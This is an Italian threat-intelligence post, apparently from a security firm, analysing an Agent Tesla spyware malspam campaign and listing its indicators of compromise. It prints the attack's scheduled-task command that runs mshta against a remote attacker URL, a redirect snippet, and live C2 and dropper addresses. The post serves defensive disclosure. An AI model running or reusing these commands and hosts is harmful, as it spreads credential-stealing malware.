Uncategorized
December 6, 2021

Agent Tesla: campagna Malware del 6 Dicembre 2021

Agent Tesla è uno Spyware che, registrando le sequenze di tasti premuti e le azioni dell’utente, esfiltra informazioni dai sistemi vittima.
Questo Spyware è stato creato utilizzando il framework .Net e trasmette i dati personali al server di comando e controllo (C2). Agent Tesla è in grado di accedere alle informazioni salvate nei browser Web, nei client di posta elettronica e nei client FTP.
Il malware è dotato di meccanismi di evasion dell’antivirus e di persistenza sul sistema per ripartire anche a fronte del riavvio del sistema compromesso.

Negli ultimi giorni è stata rilevata una nuova campagna di malspam. La mail invita l’utente a scaricare ed aprire l’allegato.

L’allegato della mail è un file in formato doc che attraverso mshta.exe contatta il dominio https://bitly[.]com/asdqwdwdsfvcxvccv il quale risponde con il seguente file html:

<html>
<head><title>Bitly</title></head>
<body><a href="https://sqlserviceazure.blogspot[.]com/p/bathindasboba[.]html">moved here</a></body>
</html>

Dopo una serie di passaggi viene creato un task schedulato attraverso il comando:

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr """"\""""MsHtA""""\""""http://1230948%1230948@sqlserverserviceagent.blogspot.com/p/justtheback.html\""""

Contemporaneamente viene scaricato ed eseguito tramite PowerShell il sample di Agent Tesla. Il quale inizierà a comunicare con il server di comando e controllo attraverso delle POST a http://microsoftazyresql.duckdns.org/j/p29oa/mawa/eae7bc3b675ad7042607.php

Agent Tesla è un keylogger e data-stealer, capace di rubare le credenziali contenute all’interno dei principali Browser, oltre ai dati di configurazione e le credenziali di VPN, FTP e client di posta.

IOC

File DOC:

  • Nome invoice#6317236-booking.com,pdf.doc
  • MD5 d74f268b986fecfa03b81029dd134811
  • SHA1 d49848ac2888e080883a427ef18b406fdcab6b9b
  • SHA256 81fcb3dce45b041a91b0c0e01c27e032d7e8d26217d4b6d669ce258b491a830d

Domini:

  • C2
    • microsoftazyresql.duckdns[.]org
    • 103.147.185[.]68
  • Dropper
    • bitly[.]com
    • 67.199.248[.]14

agent teslaexfiltrationmalspammalwarespyware

Related articles

Featured
December 18, 2023

Espionage activities targeting European businesses

In the evolving landscape of cybersecurity threats, Fortgale is tracking PhishSurf Nebula, […]
AttentionEspionagemfaphishsurf nebulaThreatActor
Learn more
Featured
December 6, 2023

Nebula Broker: offensive operations made in Italy

Fortgale has been tracking an Italian Threat Actor, internally dubbed as Nebula […]
AttentionBrokerLoadermalwareNebulaBrokerThreatActor
Learn more
qr code phishing
Featured
September 22, 2023

The Rising Threat of QR Code-Enabled Phishing Emails: Quishing

In the ever-evolving landscape of cyber threats, threat actors are constantly seeking […]
Attentionmalware campaignsphishingquishing
Learn more